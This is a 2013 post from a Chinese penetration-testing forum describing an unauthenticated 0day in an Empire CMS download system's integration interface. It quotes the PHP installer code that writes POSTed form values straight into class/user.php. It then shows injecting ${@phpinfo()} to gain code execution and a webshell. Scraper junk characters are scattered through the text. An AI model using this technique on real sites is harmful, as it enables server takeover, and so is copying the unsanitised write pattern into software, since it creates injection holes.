中国网络渗透测试联盟

标题: 帝国万能接口漏洞0day [打印本页]

作者: admin 时间: 2013-1-23 09:34
标题: 帝国万能接口漏洞0day
这是帝国的一套下载系统如图 ps(不需要任何账户和密码，直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口，如图而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码当我们
4 c$ I1 z, I$ k2 x* ]2 }( d" E7 B
, C4 u$ f0 L. D/ O$ I! c
9 {# n9 v& q& @
这是帝国的一套下载系统如图
! U. \, L+ t- D9 }2 sps(不需要任何账户和密码，直接写shell)

. ?, Z: D6 M' e3 n
由于很多站是由于下载要整合discuz 等等一些论坛....; L) J4 Y  c0 g  ~. C4 H

6 M! M6 k+ i3 s+ @而帝国他又有一个万能接口，如图

0 O5 f5 W, E& ?$ W) A$ {[attach]170[/attach]2 \  E) ?- o9 E1 c
/ A/ _6 O: f+ E
而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码; w5 G3 f$ H: a( w( T
/ T' w2 a! ^& _
当我们提交的时候，他地址是提交到index.php?install=1&setup=SetConfig
1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}
复制代码
他这里开始调用一个SetUserCOMConfig的函数了，我们继续跟踪
: P+ ~/ G  _; P8 M( e
( d/ v5 |, q" m- s0 D- v/ d在data/fun.php中的15行
9 b) \0 Q9 E6 |, O! ^! A+ [8 a: @+ J/ T
我们可以看到这个函数
1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {" [3 F7 {( E( Q5 v

17. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);
复制代码
.....//省略若干
& T* d; i$ J. M( q
1 X9 ^/ Y4 {3 P( I这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
" h* p5 h: T5 P4 z/ i% d* g. C& t8 G
他将传进来的变量进行了切割，然后赋给了$filetext, Y% X* D# O- [- g; _5 K

# H, W. e! _5 }0 l5 E2 R- s然后看下面
1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
6. }
7. @fputs($fp,$filetext);
复制代码
打开了一个class/user.php文件，然后将$filetext写入了
3 S' A+ l6 X. A1 M2 M4 x4 Z7 c) B0 v7 k. o$ \2 a
我们看看写入的结果，随便填一个

9 N' i- E6 w- W1 I' a9 ~8 t  F[attach]171[/attach]
$ a2 D6 A# x8 Y& U/ f  y4 l: F
& B1 [( e2 ]+ t6 v" {- I
3 z" t" \) i8 m* E! c[attach]172[/attach]
4 n" b0 N9 T, ]: B. a
# [, d- k6 R  A) B- y" v( N& P
: v8 J* I" z0 k0 P% u
8 _' n6 R1 n3 [6 h! B0 U% |1 d+ p) C5 f% H% B. C( _

* @* I" E# e8 p9 U( M
# E4 t( ?) ?) {' C8 v0 F( R! l! [+ n

  x7 U$ @. J) g) @, ?+ t% l+ H! W7 [0 L- ?% u2 A' h& T
[attach]173[/attach]0 i  e1 z# [8 G1 V! |/ j' i, e
9 F/ ~4 o5 P7 |6 R& s3 U
, t+ j+ C' Q7 A4 w4 N% o
. l) l& K6 \. x3 ^  i9 h, t+ j

) R9 I. l, W- S: z" f% O) r: h( Q# a
[attach]174[/attach]5 }, B+ E0 {1 M7 l
. [0 ~. V; y1 }0 [
所以我们淫荡点，写个${@phpinfo()}试试
' I8 c/ C$ u9 Y- c( }% x

然后访问以下class/user.php这个文件& _  X3 A7 Y6 c3 y# j  c5 r
日了吧
1 x" s- _. B. W: R1 Z. z) |
! N5 r* g: U2 r6 b/ R- l

9 ]1 E; g0 P# O6 O0 j  R4 e+ D4 r

! v' G5 r5 v0 w& q

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)